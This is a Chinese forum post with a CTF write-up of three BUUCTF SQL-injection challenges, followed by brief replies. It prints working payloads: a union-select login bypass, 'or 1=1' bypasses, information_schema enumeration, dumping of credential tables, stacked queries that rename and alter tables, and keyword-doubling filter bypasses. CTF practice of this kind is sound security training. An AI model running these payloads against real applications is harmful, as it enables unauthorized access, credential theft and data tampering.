吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2513|回复: 5
收起左侧

[CTF] 【buuctf】WEB SQL wp

[复制链接]
孤樱懶契 发表于 2021-8-3 12:36
本帖最后由 孤樱懶契 于 2021-8-3 12:48 编辑

[GXYCTF2019]BabySQli

1、测试注入点

image-20210520144727337

2、发现源码里面有base32到base64的解密

image-20210520144925189

image-20210520144957880

select * from user where username = '$name'
判断有一个user表

3、Order by 找字段

image-20210520145102648

image-20210520145256523

4、用联合查询创建虚拟表进行登录

image-20210520145408128

image-20210520145445923

image-20210520145534170

name=1' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'#&pw=admin

这里比较坑的就是md5加密没有提示

[强网杯 2019]随便注

1、万能密码注入

image-20210518194946967

1';rename table words to words2; 
rename table `1919810931114514` to `words`;
 alter table words change flag id varchar(100);
  show tables; 
  show columns from words;#

image-20210518200458235

[极客大挑战 2019]LoveSQL

1、万能密码注入

‘ or 1=1 #

image-20210518205129073

2、找字段

' order by 3 #

’ union select 1,2,3; #  找回显

2' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() #

3、爆表

image-20210518205534376

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser' #

image-20210518205747038

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
2' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

2' uunionnion sselectelect 1,2,group_concat(id,username,passwoordd) ffromrom l0ve1ysq1 #

image-20210518210415619

免费评分

参与人数 3威望 +1 吾爱币 +37 热心值 +3 收起 理由
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Sound + 16 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
笙若 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

头像被屏蔽
Wits 发表于 2021-8-3 14:28
提示: 作者被禁止或删除 内容自动屏蔽
t1r0 发表于 2021-8-3 15:49
aliya0416 发表于 2021-8-3 21:25
大佬就是大佬,学习学习,谢谢楼主整理分享
wss0823 发表于 2021-8-4 09:55
现在sql注入难度越来越大了,大部分代码对写入的条件都进行符号的转义了。
Tamluo 发表于 2021-8-4 12:26
大佬就是大佬,学习学习,谢谢楼主整理分享
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-26 02:11

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表